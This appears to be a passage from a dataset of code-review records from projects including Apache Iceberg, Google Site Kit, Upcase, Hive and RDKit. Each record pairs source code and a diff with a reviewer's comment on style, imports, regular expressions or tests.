if (asNamespaceCatalog != null) {
Map<String, String> updates = Maps.newHashMap();
Set<String> removals = Sets.newHashSet();
for (NamespaceChange change : changes) {
if (change instanceof NamespaceChange.SetProperty) {
NamespaceChange.SetProperty set = (NamespaceChange.SetProperty) change;
updates.put(set.property(), set.value());
} else if (change instanceof NamespaceChange.RemoveProperty) {
removals.add(((NamespaceChange.RemoveProperty) change).property());
} else {
throw new UnsupportedOperationException("Cannot apply unknown namespace change: " + change);
}
}
try {
if (!updates.isEmpty()) {
asNamespaceCatalog.setProperties(Namespace.of(namespace), updates);
}
if (!removals.isEmpty()) {
asNamespaceCatalog.removeProperties(Namespace.of(namespace), removals);
}
} catch (org.apache.iceberg.exceptions.NoSuchNamespaceException e) {
throw new NoSuchNamespaceException(namespace);
}
} else {
throw new NoSuchNamespaceException(namespace);
}
}
@Override
public boolean dropNamespace(String[] namespace) throws NoSuchNamespaceException {
if (asNamespaceCatalog != null) {
try {
return asNamespaceCatalog.dropNamespace(Namespace.of(namespace));
} catch (org.apache.iceberg.exceptions.NoSuchNamespaceException e) {
throw new NoSuchNamespaceException(namespace);
}
}
return false;
}
@Override
public final void initialize(String name, CaseInsensitiveStringMap options) {
this.cacheEnabled = Boolean.parseBoolean(options.getOrDefault("cache-enabled", "true"));
Catalog catalog = buildIcebergCatalog(name, options);
this.catalogName = name;
this.tables = new HadoopTables(SparkSession.active().sessionState().newHadoopConf());
this.icebergCatalog = cacheEnabled ? CachingCatalog.wrap(catalog) : catalog;
if (catalog instanceof SupportsNamespaces) {
this.asNamespaceCatalog = (SupportsNamespaces) catalog;
if (options.containsKey("default-namespace")) {
this.defaultNamespace = Splitter.on('.')
.splitToList(options.get("default-namespace"))
.toArray(new String[0]);
}
}
}
@Override
public String name() {
return catalogName;
}
private static void commitChanges(Table table, SetProperty setLocation, SetProperty setSnapshotId,
SetProperty pickSnapshotId, List<TableChange> propertyChanges,
List<TableChange> schemaChanges) {
// don't allow setting the snapshot and picking a commit at the same time because order is ambiguous and choosing
// one order leads to different results
Preconditions.checkArgument(setSnapshotId == null || pickSnapshotId == null,
"Cannot set the current the current snapshot ID and cherry-pick snapshot changes");
if (setSnapshotId != null) {
long newSnapshotId = Long.parseLong(setSnapshotId.value());
table.manageSnapshots().setCurrentSnapshot(newSnapshotId).commit();
}
// if updating the table snapshot, perform that update first in case it fails
if (pickSnapshotId != null) {
long newSnapshotId = Long.parseLong(pickSnapshotId.value());
table.manageSnapshots().cherrypick(newSnapshotId).commit();
}
Transaction transaction = table.newTransaction();
if (setLocation != null) {
transaction.updateLocation()
.setLocation(setLocation.value())
.commit();
}
if (!propertyChanges.isEmpty()) {
Spark3Util.applyPropertyChanges(transaction.updateProperties(), propertyChanges).commit();
}
if (!schemaChanges.isEmpty()) {
Spark3Util.applySchemaChanges(transaction.updateSchema(), schemaChanges).commit();
}
transaction.commitTransaction();
}
private static boolean isPathIdentifier(Identifier ident) {
return ident instanceof PathIdentifier;
}
private static void checkNotPathIdentifier(Identifier identifier, String method) {
if (identifier instanceof PathIdentifier) {
throw new IllegalArgumentException(String.format("Cannot pass path based identifier to %s method. %s is a path.",
method, identifier));
}
}
private Table load(Identifier ident) {
return isPathIdentifier(ident) ?
tables.load(((PathIdentifier) ident).location()) :
icebergCatalog.loadTable(buildIdentifier(ident));
}
private Catalog.TableBuilder newBuilder(Identifier ident, Schema schema) {
return isPathIdentifier(ident) ?
tables.buildTable(((PathIdentifier) ident).location(), schema) :
icebergCatalog.buildTable(buildIdentifier(ident), schema);
}
}
| 1 | 35,959 | One nit here I forgot about this before but we usually structure error messages as "Cannot X because Y. Then the recommendation goes here" I would also recommend not using "it" in the message since it the pronoun is a bit ambiguous. "to specify write sort-order" may be clearer | apache-iceberg | java |
@@ -26,7 +26,8 @@ import {
} from '../../../../../tests/js/utils';
import * as CacheModule from '../../../googlesitekit/api/cache';
import { STORE_NAME } from './constants';
-import initialState, {
+import {
+ initialState,
FEATURE_TOUR_COOLDOWN_SECONDS,
FEATURE_TOUR_LAST_DISMISSED_AT,
} from './feature-tours'; | 1 | /**
* `core/user` data store: feature tours tests.
*
* Site Kit by Google, Copyright 2021 Google LLC
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/**
* Internal dependencies
*/
import {
createTestRegistry,
muteFetch,
untilResolved,
} from '../../../../../tests/js/utils';
import * as CacheModule from '../../../googlesitekit/api/cache';
import { STORE_NAME } from './constants';
import initialState, {
FEATURE_TOUR_COOLDOWN_SECONDS,
FEATURE_TOUR_LAST_DISMISSED_AT,
} from './feature-tours';
const { setItem } = CacheModule;
describe( 'core/user feature-tours', () => {
let registry;
let store;
let setItemSpy;
const testTourA = {
slug: 'test-tour-a',
version: '2.0.0',
contexts: [ 'common-context' ],
steps: [
{
title: 'Test Tour A - Step 1 Title',
content: 'Test Tour A - Step 1 Content',
target: 'test-tour-a-step-1-target',
},
],
};
const testTourB = {
slug: 'test-tour-b',
version: '2.1.0',
contexts: [ 'common-context', 'b-only-context' ],
steps: [
{
title: 'Test Tour B - Step 1 Title',
content: 'Test Tour B - Step 1 Content',
target: 'test-tour-b-step-1-target',
},
],
};
beforeEach( () => {
setItemSpy = jest.spyOn( CacheModule, 'setItem' );
registry = createTestRegistry();
store = registry.stores[ STORE_NAME ].store;
registry.dispatch( STORE_NAME ).receiveInitialSiteKitVersion( '1.0.0' );
} );
afterEach( () => {
setItemSpy.mockRestore();
} );
describe( 'actions', () => {
describe( 'dismissTour', () => {
const fetchDismissTourRegExp = /^\/google-site-kit\/v1\/core\/user\/data\/dismiss-tour/;
it( 'requires a slug parameter', () => {
expect( () => registry.dispatch( STORE_NAME ).dismissTour() )
.toThrow( /a tour slug is required/i );
} );
it( 'adds the slug to dismissedTourSlugs immediately', () => {
muteFetch( fetchDismissTourRegExp, [] );
expect( store.getState().dismissedTourSlugs ).toBe( initialState.dismissedTourSlugs );
expect( store.getState().dismissedTourSlugs || [] ).not.toContain( 'test-tour' );
registry.dispatch( STORE_NAME ).dismissTour( 'test-tour' );
expect( store.getState().dismissedTourSlugs ).toContain( 'test-tour' );
} );
it( 'dispatches a fetch request to persist the dismissal', async () => {
muteFetch( fetchDismissTourRegExp, [] );
await registry.dispatch( STORE_NAME ).dismissTour( 'test-tour' );
expect( fetchMock ).toHaveFetched( fetchDismissTourRegExp );
} );
it( 'receives all dismissed tours as the new state from the server', async () => {
fetchMock.postOnce( fetchDismissTourRegExp, { body: [ 'tour-a', 'tour-b' ] } );
await registry.dispatch( STORE_NAME ).dismissTour( 'tour-b' );
expect( store.getState().dismissedTourSlugs ).toEqual(
expect.arrayContaining( [ 'tour-a', 'tour-b' ] )
);
} );
it( 'sets the lastDismissedAt timestamp to mark the start of the cooldown period', async () => {
muteFetch( fetchDismissTourRegExp, [] );
await registry.dispatch( STORE_NAME ).dismissTour( 'test-tour' );
expect( store.getState().lastDismissedAt ).toBeDefined();
// cache should have been set as well
expect( setItemSpy ).toHaveBeenCalledWith(
FEATURE_TOUR_LAST_DISMISSED_AT,
expect.any( Number ), // timestamp
expect.objectContaining( { ttl: FEATURE_TOUR_COOLDOWN_SECONDS } ),
);
} );
} );
describe( 'receiveAllFeatureTours', () => {
it( 'requires tours to be an array', () => {
expect( () => registry.dispatch( STORE_NAME ).receiveAllFeatureTours() )
.toThrow( 'tours must be an array' );
} );
it( 'receives the given tours into the state', () => {
const tours = [ testTourA, testTourB ];
registry.dispatch( STORE_NAME ).receiveAllFeatureTours( tours );
expect( store.getState().tours ).toEqual( tours );
} );
} );
describe( 'receiveFeatureToursForView', () => {
it( 'requires viewTours to be an array', () => {
expect( () => registry.dispatch( STORE_NAME ).receiveFeatureToursForView() )
.toThrow( 'viewTours must be an array' );
} );
it( 'requires a viewContext to be provided for the viewTours', () => {
expect( () => registry.dispatch( STORE_NAME ).receiveFeatureToursForView( [] ) )
.toThrow( 'viewContext is required' );
} );
it( 'receives the given viewTours into the state for the viewContext', () => {
const tours = [ testTourA, testTourB ];
registry.dispatch( STORE_NAME ).receiveFeatureToursForView( tours, { viewContext: 'foo' } );
expect( store.getState().viewTours.foo ).toEqual( tours );
} );
} );
describe( 'receiveLastDismissedAt', () => {
it( 'requires a timestamp to be provided', () => {
expect( () => registry.dispatch( STORE_NAME ).receiveLastDismissedAt() )
.toThrow( 'A timestamp is required.' );
} );
it( 'sets the lastDismissedAt timestamp in the store', () => {
const timestamp = Date.now();
registry.dispatch( STORE_NAME ).receiveLastDismissedAt( timestamp );
expect( store.getState().lastDismissedAt ).toEqual( timestamp );
} );
} );
describe( 'setLastDismissedAt', () => {
it( 'requires a timestamp to be provided', () => {
expect( () => registry.dispatch( STORE_NAME ).receiveLastDismissedAt() )
.toThrow( 'A timestamp is required.' );
} );
it( 'sets the lastDismissedAt timestamp in the store', async () => {
const timestamp = Date.now();
await registry.dispatch( STORE_NAME ).setLastDismissedAt( timestamp );
expect( store.getState().lastDismissedAt ).toEqual( timestamp );
} );
it( 'sets the lastDismissedAt timestamp in the cache', async () => {
const timestamp = Date.now();
await registry.dispatch( STORE_NAME ).setLastDismissedAt( timestamp );
expect( setItemSpy ).toHaveBeenCalledWith(
FEATURE_TOUR_LAST_DISMISSED_AT,
timestamp,
expect.objectContaining( { ttl: FEATURE_TOUR_COOLDOWN_SECONDS } )
);
} );
} );
} );
describe( 'selectors', () => {
const fetchGetDismissedToursRegExp = /^\/google-site-kit\/v1\/core\/user\/data\/dismissed-tours/;
describe( 'getDismissedFeatureTourSlugs', () => {
it( 'returns the initial state before the resolver runs', () => {
muteFetch( fetchGetDismissedToursRegExp, [] );
expect( registry.select( STORE_NAME ).getDismissedFeatureTourSlugs() ).toBe( initialState.dismissedTourSlugs );
} );
it( 'receives dismissed tours from the fetch dispatched by the resolver', async () => {
fetchMock.getOnce( fetchGetDismissedToursRegExp, { body: [ 'feature-x' ] } );
registry.select( STORE_NAME ).getDismissedFeatureTourSlugs();
await untilResolved( registry, STORE_NAME ).getDismissedFeatureTourSlugs();
expect( registry.select( STORE_NAME ).getDismissedFeatureTourSlugs() ).toEqual( [ 'feature-x' ] );
expect( fetchMock ).toHaveFetched();
} );
it( 'does not fetch if there are already dismissed tours in state', () => {
registry.dispatch( STORE_NAME ).receiveGetDismissedTours( [] );
registry.select( STORE_NAME ).getDismissedFeatureTourSlugs();
expect( fetchMock ).not.toHaveFetched();
} );
it( 'returns the list of dismissed tours', () => {
registry.dispatch( STORE_NAME ).receiveGetDismissedTours( [] );
expect( registry.select( STORE_NAME ).getDismissedFeatureTourSlugs() ).toEqual( [] );
registry.dispatch( STORE_NAME ).receiveGetDismissedTours( [ 'tour-a', 'feature-x' ] );
expect( registry.select( STORE_NAME ).getDismissedFeatureTourSlugs() ).toEqual(
expect.arrayContaining( [ 'feature-x', 'tour-a' ] )
);
} );
} );
describe( 'getFeatureToursForView', () => {
beforeEach( () => {
registry.dispatch( STORE_NAME ).receiveGetDismissedTours( [] );
} );
it( 'returns `undefined` while tour readiness is being resolved', () => {
expect(
registry.select( STORE_NAME ).getFeatureToursForView( 'test-view-context' )
).toBeUndefined();
} );
it( 'returns an array of tours that qualify for the given view context', async () => {
registry.dispatch( STORE_NAME ).receiveAllFeatureTours( [ testTourA, testTourB ] );
expect(
await registry.__experimentalResolveSelect( STORE_NAME ).getFeatureToursForView( 'common-context' )
).toEqual( [ testTourA, testTourB ] );
expect(
await registry.__experimentalResolveSelect( STORE_NAME ).getFeatureToursForView( 'b-only-context' )
).toEqual( [ testTourB ] );
} );
it( 'returns an array of tours that have a version greater than the user’s initial Site Kit version', async () => {
const initialVersion = '1.0.0';
const tourVersion = '2.0.0';
registry.dispatch( STORE_NAME ).receiveInitialSiteKitVersion( initialVersion );
registry.dispatch( STORE_NAME ).receiveAllFeatureTours( [
{ ...testTourA, version: initialVersion },
{ ...testTourB, version: tourVersion },
] );
// Tour A's version matches the user's initial version, so only Tour B is returned.
const viewTours = await registry.__experimentalResolveSelect( STORE_NAME ).getFeatureToursForView( 'common-context' );
expect( viewTours.map( ( { slug } ) => slug ) ).toEqual( [ testTourB.slug ] );
} );
it( 'returns an array of tours that have not been dismissed by the user yet', async () => {
registry.dispatch( STORE_NAME ).receiveAllFeatureTours( [ testTourA, testTourB ] );
registry.dispatch( STORE_NAME ).receiveGetDismissedTours( [ testTourB.slug ] );
// Tour B was received as dismissed, but A was not.
expect(
await registry.__experimentalResolveSelect( STORE_NAME ).getFeatureToursForView( 'common-context' )
).toEqual( [ testTourA ] );
} );
it( 'returns an array of tours that use their own logic for checking additional requirements', async () => {
// Check A will resolve with `true` on the next tick.
const checkA = jest.fn(
async () => new Promise( ( resolve ) => setTimeout( resolve( true ) ) )
);
// Check B will resolve with `false` on the next tick.
const checkB = jest.fn(
async () => new Promise( ( resolve ) => setTimeout( resolve( false ) ) )
);
registry.dispatch( STORE_NAME ).receiveAllFeatureTours( [
{ ...testTourA, checkRequirements: checkA },
{ ...testTourB, checkRequirements: checkB },
] );
const viewTours = await registry.__experimentalResolveSelect( STORE_NAME ).getFeatureToursForView( 'common-context' );
expect( viewTours.map( ( { slug } ) => slug ) ).toEqual( [ testTourA.slug ] );
// Check functions should be called with the registry as the first parameter.
const registryMatcher = expect.objectContaining( {
select: expect.any( Function ),
dispatch: expect.any( Function ),
} );
// The registry instance passed to the function is slightly different for some reason
// so we can't simply call `.toHaveBeenCalledWith( registry )`
expect( checkA ).toHaveBeenCalledWith( registryMatcher );
expect( checkB ).toHaveBeenCalledWith( registryMatcher );
} );
} );
describe( 'getAllFeatureTours', () => {
it( 'returns all tours in the store', () => {
const tours = [ testTourA, testTourB ];
registry.dispatch( STORE_NAME ).receiveAllFeatureTours( tours );
expect(
registry.select( STORE_NAME ).getAllFeatureTours()
).toEqual( tours );
} );
} );
describe( 'isTourDismissed', () => {
it( 'returns `true` if the given slug is in the current list of dismissed tours', () => {
registry.dispatch( STORE_NAME ).receiveGetDismissedTours( [] );
expect( registry.select( STORE_NAME ).isTourDismissed( 'feature-x' ) ).toBe( false );
registry.dispatch( STORE_NAME ).receiveGetDismissedTours( [ 'feature-x', 'tour-y' ] );
expect( registry.select( STORE_NAME ).isTourDismissed( 'feature-x' ) ).toBe( true );
} );
it( 'will trigger the resolver for getDismissedFeatureTourSlugs and fetch if necessary', () => {
muteFetch( fetchGetDismissedToursRegExp );
registry.select( STORE_NAME ).isTourDismissed( 'feature-x' );
expect( fetchMock ).toHaveFetched( fetchGetDismissedToursRegExp );
} );
it( 'returns `undefined` if dismissed tours are not resolved yet', () => {
// The request will respond that `feature-x` _is dismissed_
// but the selector will return `false` until the response is received.
fetchMock.getOnce( fetchGetDismissedToursRegExp, { body: [ 'feature-x' ] } );
expect( registry.select( STORE_NAME ).isTourDismissed( 'feature-x' ) ).toBeUndefined();
} );
} );
describe( 'getLastDismissedAt', () => {
// Note: storage is cleared before every test in the global config.
it( 'returns initial state (undefined) if there is no lastDismissedAt timestamp', () => {
const lastDismissedAt = registry.select( STORE_NAME ).getLastDismissedAt();
expect( lastDismissedAt ).toEqual( undefined );
} );
it( 'returns the lastDismissedAt timestamp if there is one', () => {
const timestamp = Date.now();
registry.dispatch( STORE_NAME ).receiveLastDismissedAt( timestamp );
expect( registry.select( STORE_NAME ).getLastDismissedAt() ).toEqual( timestamp );
} );
it( 'uses a resolver to set lastDismissedAt in the store if there is a value in the cache', async () => {
const timestamp = Date.now();
await setItem( FEATURE_TOUR_LAST_DISMISSED_AT, timestamp );
registry.select( STORE_NAME ).getLastDismissedAt();
await untilResolved( registry, STORE_NAME ).getLastDismissedAt();
expect( registry.select( STORE_NAME ).getLastDismissedAt() ).toBe( timestamp );
} );
it( 'returns false for an expired lastDismissedAt value in the cache', async () => {
const timestamp = Date.now();
// Set an item that is guaranteed to be expired when called with `getItem`
await setItem( FEATURE_TOUR_LAST_DISMISSED_AT, timestamp, { ttl: -1 } );
registry.select( STORE_NAME ).getLastDismissedAt();
await untilResolved( registry, STORE_NAME ).getLastDismissedAt();
expect( registry.select( STORE_NAME ).getLastDismissedAt() ).toBe( null );
} );
} );
describe( 'areFeatureToursOnCooldown', () => {
it( 'returns undefined if there is no lastDismissedAt timestamp', () => {
expect( registry.select( STORE_NAME ).areFeatureToursOnCooldown() ).toBeUndefined();
} );
it( 'returns true if the lastDismissedAt timestamp is within the feature tour cooldown period', () => {
const timestamp = Date.now();
const coolDownPeriodMilliseconds = FEATURE_TOUR_COOLDOWN_SECONDS * 1000;
const justInsideCoolDownPeriod = timestamp + coolDownPeriodMilliseconds - 1000;
registry.dispatch( STORE_NAME ).receiveLastDismissedAt( justInsideCoolDownPeriod );
expect( registry.select( STORE_NAME ).areFeatureToursOnCooldown() ).toEqual( true );
} );
it( 'returns false if the feature tour cooldown period has expired', () => {
const coolDownPeriodMilliseconds = FEATURE_TOUR_COOLDOWN_SECONDS * 1000;
const startOfCoolDownPeriod = Date.now() - coolDownPeriodMilliseconds;
registry.dispatch( STORE_NAME ).receiveLastDismissedAt( startOfCoolDownPeriod );
expect( registry.select( STORE_NAME ).areFeatureToursOnCooldown() ).toEqual( false );
} );
it( 'returns false for an expired lastDismissedAt value in the cache', async () => {
registry.dispatch( STORE_NAME ).receiveLastDismissedAt( null );
expect( registry.select( STORE_NAME ).areFeatureToursOnCooldown() ).toEqual( false );
} );
} );
} );
} );
| 1 | 40,127 | I'm surprised this worked at all! It was importing the default export but `eslint-plugin-import` warned me `warning Using exported name 'initialState' as identifier for default export import/no-named-as-default` | google-site-kit-wp | js |
@@ -1,10 +1,9 @@
class VideoTutorial < Product
- has_many :teachers, dependent: :destroy
- has_many :users, through: :teachers
+ validates :description, :tagline, presence: true
- # Validations
- validates :description, presence: true
- validates :tagline, presence: true
+ def teachers
+ Teacher.joins(:video).merge(videos)
+ end
def collection?
published_videos.count > 1 | 1 | class VideoTutorial < Product
has_many :teachers, dependent: :destroy
has_many :users, through: :teachers
# Validations
validates :description, presence: true
validates :tagline, presence: true
def collection?
published_videos.count > 1
end
def included_in_plan?(plan)
plan.has_feature?(:video_tutorials)
end
end
| 1 | 13,563 | This was used in `app/views/video_tutorials/_video_tutorial_details.html.erb` how are we handling that now? | thoughtbot-upcase | rb |
@@ -8,8 +8,9 @@ var (
newlineTabRE = regexp.MustCompile(`\n\t`)
certificateTimeErrorRE = regexp.MustCompile(`: current time \S+ is after \S+`)
// aws
- awsRequestIDRE = regexp.MustCompile(`(, )*(?i)(request id: )(?:[-[:xdigit:]]+)`)
- awsNotAuthorized = regexp.MustCompile(`(User: arn:aws:sts::)\S+(:assumed-role/[^/]+/)\S+( is not authorized to perform: \S+ on resource: arn:aws:iam::)[^:]+(:\S+)`)
+ awsRequestIDRE = regexp.MustCompile(`(, )*(?i)(request id: )(?:[-[:xdigit:]]+)`)
+ awsNotAuthorized = regexp.MustCompile(`(User: arn:aws:sts::)\S+(:assumed-role/[^/]+/)\S+( is not authorized to perform: \S+ on resource: arn:aws:iam::)[^:]+(:\S+)`)
+ awsEncodedMessage = regexp.MustCompile(`(Encoded authorization failure message: )\S+(,)`)
// azure
azureErrorDescriptionRE = regexp.MustCompile(`\"error_description\":\"(.*?)\\r\\n`)
) | 1 | package utils
import (
"regexp"
)
var (
newlineTabRE = regexp.MustCompile(`\n\t`)
certificateTimeErrorRE = regexp.MustCompile(`: current time \S+ is after \S+`)
// aws
awsRequestIDRE = regexp.MustCompile(`(, )*(?i)(request id: )(?:[-[:xdigit:]]+)`)
awsNotAuthorized = regexp.MustCompile(`(User: arn:aws:sts::)\S+(:assumed-role/[^/]+/)\S+( is not authorized to perform: \S+ on resource: arn:aws:iam::)[^:]+(:\S+)`)
// azure
azureErrorDescriptionRE = regexp.MustCompile(`\"error_description\":\"(.*?)\\r\\n`)
)
// ErrorScrub scrubs cloud error messages destined for CRD status to remove things that
// change every attempt, such as request IDs, which subsequently cause an infinite update/reconcile loop.
func ErrorScrub(err error) string {
if err == nil {
return ""
}
s := newlineTabRE.ReplaceAllString(err.Error(), ", ")
s = awsRequestIDRE.ReplaceAllString(s, "")
s = awsNotAuthorized.ReplaceAllString(s, `${1}XXX${2}XXX${3}XXX${4}`)
s = certificateTimeErrorRE.ReplaceAllString(s, "")
// if Azure error, return just the error description
match := azureErrorDescriptionRE.FindStringSubmatch(s)
if len(match) > 0 {
return match[1]
}
return s
}
| 1 | 19,390 | Is `\S+` really the right thing? Anybody know what kind of encoding this is? Perhaps if we know it doesn't have commas, we can just use `[^,]+`. Also, parens around the comma are unnecessary, since we're not using the capture group. | openshift-hive | go |
@@ -1,10 +1,8 @@
tests = [
+ ("python", "UnitTestDocTests.py", {}),
("python", "UnitTestcBitVect.py", {}),
("python", "UnitTestBitEnsemble.py", {}),
("python", "UnitTestTopNContainer.py", {}),
- ("python", "BitUtils.py", {}),
- ("python", "VectCollection.py", {}),
- ("python", "LazySignature.py", {}),
]
longTests = []
| 1 | tests = [
("python", "UnitTestcBitVect.py", {}),
("python", "UnitTestBitEnsemble.py", {}),
("python", "UnitTestTopNContainer.py", {}),
("python", "BitUtils.py", {}),
("python", "VectCollection.py", {}),
("python", "LazySignature.py", {}),
]
longTests = []
if __name__ == '__main__':
import sys
from rdkit import TestRunner
failed, tests = TestRunner.RunScript('test_list.py', 0, 1)
sys.exit(len(failed))
| 1 | 16,217 | This block of changes looks like you removed tests without replacing them anywhere. Did I miss something? | rdkit-rdkit | cpp |
@@ -360,7 +360,10 @@ struct atom_wrapper {
.def("GetPropNames", &Atom::getPropList, (python::arg("self")),
"Returns a list of the properties set on the Atom.\n\n")
- .def("GetPropsAsDict", GetPropsAsDict<Atom>, (python::arg("self")),
+ .def("GetPropsAsDict", GetPropsAsDict<Atom>, (python::arg("self"),
+ python::arg("includePrivate") = true,
+ python::arg("includeComputed") = true
+ ),
"Returns a dictionary of the properties set on the Atom.\n"
" n.b. some properties cannot be converted to python types.\n")
| 1 | // $Id$
//
// Copyright (C) 2003-2013 Greg Landrum and Rational Discovery LLC
//
// @@ All Rights Reserved @@
// This file is part of the RDKit.
// The contents are covered by the terms of the BSD license
// which is included in the file license.txt, found at the root
// of the RDKit source tree.
//
#define NO_IMPORT_ARRAY
#include <RDBoost/python.h>
#include <string>
#include <GraphMol/RDKitBase.h>
#include <GraphMol/QueryAtom.h>
#include <GraphMol/MonomerInfo.h>
#include <RDGeneral/types.h>
#include <Geometry/point.h>
#include <GraphMol/SmilesParse/SmilesWrite.h>
#include <GraphMol/SmilesParse/SmartsWrite.h>
#include <RDBoost/Wrap.h>
#include "seqs.hpp"
#include "props.hpp"
#include <algorithm>
namespace python = boost::python;
namespace RDKit {
namespace {
std::string qhelper(Atom::QUERYATOM_QUERY *q, unsigned int depth) {
std::string res = "";
if (q) {
for (unsigned int i = 0; i < depth; ++i) res += " ";
res += q->getFullDescription() + "\n";
for (Atom::QUERYATOM_QUERY::CHILD_VECT_CI ci = q->beginChildren();
ci != q->endChildren(); ++ci) {
res += qhelper((*ci).get(), depth + 1);
}
}
return res;
}
} // end of local namespace
std::string describeQuery(const Atom *atom) {
std::string res = "";
if (atom->hasQuery()) {
res = qhelper(atom->getQuery(), 0);
}
return res;
}
void expandQuery(QueryAtom *self, const QueryAtom *other,
Queries::CompositeQueryType how, bool maintainOrder) {
if (other->hasQuery()) {
const QueryAtom::QUERYATOM_QUERY *qry = other->getQuery();
self->expandQuery(qry->copy(), how, maintainOrder);
}
}
template <class T>
void AtomSetProp(const Atom *atom, const char *key, const T &val) {
// std::cerr<<"asp: "<<atom<<" " << key<<" - " << val << std::endl;
atom->setProp<T>(key, val);
}
int AtomHasProp(const Atom *atom, const char *key) {
// std::cerr<<"ahp: "<<atom<<" " << key<< std::endl;
int res = atom->hasProp(key);
return res;
}
void AtomClearProp(const Atom *atom, const char *key) {
if (!atom->hasProp(key)) {
return;
}
atom->clearProp(key);
}
python::tuple AtomGetNeighbors(Atom *atom) {
python::list res;
const ROMol *parent = &atom->getOwningMol();
ROMol::ADJ_ITER begin, end;
boost::tie(begin, end) = parent->getAtomNeighbors(atom);
while (begin != end) {
res.append(python::ptr(parent->getAtomWithIdx(*begin)));
begin++;
}
return python::tuple(res);
}
python::tuple AtomGetBonds(Atom *atom) {
python::list res;
const ROMol *parent = &atom->getOwningMol();
ROMol::OEDGE_ITER begin, end;
boost::tie(begin, end) = parent->getAtomBonds(atom);
while (begin != end) {
Bond *tmpB = (*parent)[*begin].get();
res.append(python::ptr(tmpB));
begin++;
}
return python::tuple(res);
}
bool AtomIsInRing(const Atom *atom) {
if (!atom->getOwningMol().getRingInfo()->isInitialized()) {
MolOps::findSSSR(atom->getOwningMol());
}
return atom->getOwningMol().getRingInfo()->numAtomRings(atom->getIdx()) != 0;
}
bool AtomIsInRingSize(const Atom *atom, int size) {
if (!atom->getOwningMol().getRingInfo()->isInitialized()) {
MolOps::findSSSR(atom->getOwningMol());
}
return atom->getOwningMol().getRingInfo()->isAtomInRingOfSize(atom->getIdx(),
size);
}
std::string AtomGetSmarts(const Atom *atom) {
std::string res;
if (atom->hasQuery()) {
res = SmartsWrite::GetAtomSmarts(static_cast<const QueryAtom *>(atom));
} else {
res = SmilesWrite::GetAtomSmiles(atom);
}
return res;
}
void SetAtomMonomerInfo(Atom *atom, const AtomMonomerInfo *info) {
atom->setMonomerInfo(info->copy());
}
AtomMonomerInfo *AtomGetMonomerInfo(Atom *atom) {
return atom->getMonomerInfo();
}
AtomPDBResidueInfo *AtomGetPDBResidueInfo(Atom *atom) {
AtomMonomerInfo *res = atom->getMonomerInfo();
if (!res) return NULL;
if (res->getMonomerType() != AtomMonomerInfo::PDBRESIDUE) {
throw_value_error("MonomerInfo is not a PDB Residue");
}
return (AtomPDBResidueInfo *)res;
}
// FIX: is there any reason at all to not just prevent the construction of
// Atoms?
std::string atomClassDoc =
"The class to store Atoms.\n\
Note that, though it is possible to create one, having an Atom on its own\n\
(i.e not associated with a molecule) is not particularly useful.\n";
struct atom_wrapper {
static void wrap() {
python::class_<Atom>("Atom", atomClassDoc.c_str(),
python::init<std::string>())
.def(python::init<unsigned int>(
"Constructor, takes either an int (atomic number) or a string "
"(atomic symbol).\n"))
.def("GetAtomicNum", &Atom::getAtomicNum, "Returns the atomic number.")
.def("SetAtomicNum", &Atom::setAtomicNum,
"Sets the atomic number, takes an integer value as an argument")
.def("GetSymbol", &Atom::getSymbol,
"Returns the atomic symbol (a string)\n")
.def("GetIdx", &Atom::getIdx,
"Returns the atom's index (ordering in the molecule)\n")
.def("GetDegree", &Atom::getDegree,
"Returns the degree of the atom in the molecule.\n\n"
" The degree of an atom is defined to be its number of\n"
" directly-bonded neighbors.\n"
" The degree is independent of bond orders, but is dependent\n"
" on whether or not Hs are explicit in the graph.\n")
.def("GetTotalDegree", &Atom::getTotalDegree,
"Returns the degree of the atom in the molecule including Hs.\n\n"
" The degree of an atom is defined to be its number of\n"
" directly-bonded neighbors.\n"
" The degree is independent of bond orders.\n")
.def("GetTotalNumHs", &Atom::getTotalNumHs,
(python::arg("self"), python::arg("includeNeighbors") = false),
"Returns the total number of Hs (explicit and implicit) on the "
"atom.\n\n"
" ARGUMENTS:\n\n"
" - includeNeighbors: (optional) toggles inclusion of "
"neighboring H atoms in the sum.\n"
" Defaults to 0.\n")
.def("GetNumImplicitHs", &Atom::getNumImplicitHs,
"Returns the total number of implicit Hs on the atom.\n")
.def("GetExplicitValence", &Atom::getExplicitValence,
"Returns the number of explicit Hs on the atom.\n")
.def("GetImplicitValence", &Atom::getImplicitValence,
"Returns the number of implicit Hs on the atom.\n")
.def("GetTotalValence", &Atom::getTotalValence,
"Returns the total valence (explicit + implicit) of the atom.\n\n")
.def("GetFormalCharge", &Atom::getFormalCharge)
.def("SetFormalCharge", &Atom::setFormalCharge)
.def("SetNoImplicit", &Atom::setNoImplicit,
"Sets a marker on the atom that *disallows* implicit Hs.\n"
" This holds even if the atom would otherwise have implicit Hs "
"added.\n")
.def("GetNoImplicit", &Atom::getNoImplicit,
"Returns whether or not the atom is *allowed* to have implicit "
"Hs.\n")
.def("SetNumExplicitHs", &Atom::setNumExplicitHs)
.def("GetNumExplicitHs", &Atom::getNumExplicitHs)
.def("SetIsAromatic", &Atom::setIsAromatic)
.def("GetIsAromatic", &Atom::getIsAromatic)
.def("GetMass", &Atom::getMass)
.def("SetIsotope", &Atom::setIsotope)
.def("GetIsotope", &Atom::getIsotope)
.def("SetNumRadicalElectrons", &Atom::setNumRadicalElectrons)
.def("GetNumRadicalElectrons", &Atom::getNumRadicalElectrons)
.def("SetChiralTag", &Atom::setChiralTag)
.def("InvertChirality", &Atom::invertChirality)
.def("GetChiralTag", &Atom::getChiralTag)
.def("SetHybridization", &Atom::setHybridization,
"Sets the hybridization of the atom.\n"
" The argument should be a HybridizationType\n")
.def("GetHybridization", &Atom::getHybridization,
"Returns the atom's hybridization.\n")
.def("GetOwningMol", &Atom::getOwningMol,
"Returns the Mol that owns this atom.\n",
python::return_value_policy<python::reference_existing_object>())
.def("GetNeighbors", AtomGetNeighbors,
"Returns a read-only sequence of the atom's neighbors\n")
.def("GetBonds", AtomGetBonds,
"Returns a read-only sequence of the atom's bonds\n")
.def("Match", (bool (Atom::*)(const Atom *) const) & Atom::Match,
"Returns whether or not this atom matches another Atom.\n\n"
" Each Atom (or query Atom) has a query function which is\n"
" used for this type of matching.\n\n"
" ARGUMENTS:\n"
" - other: the other Atom to which to compare\n")
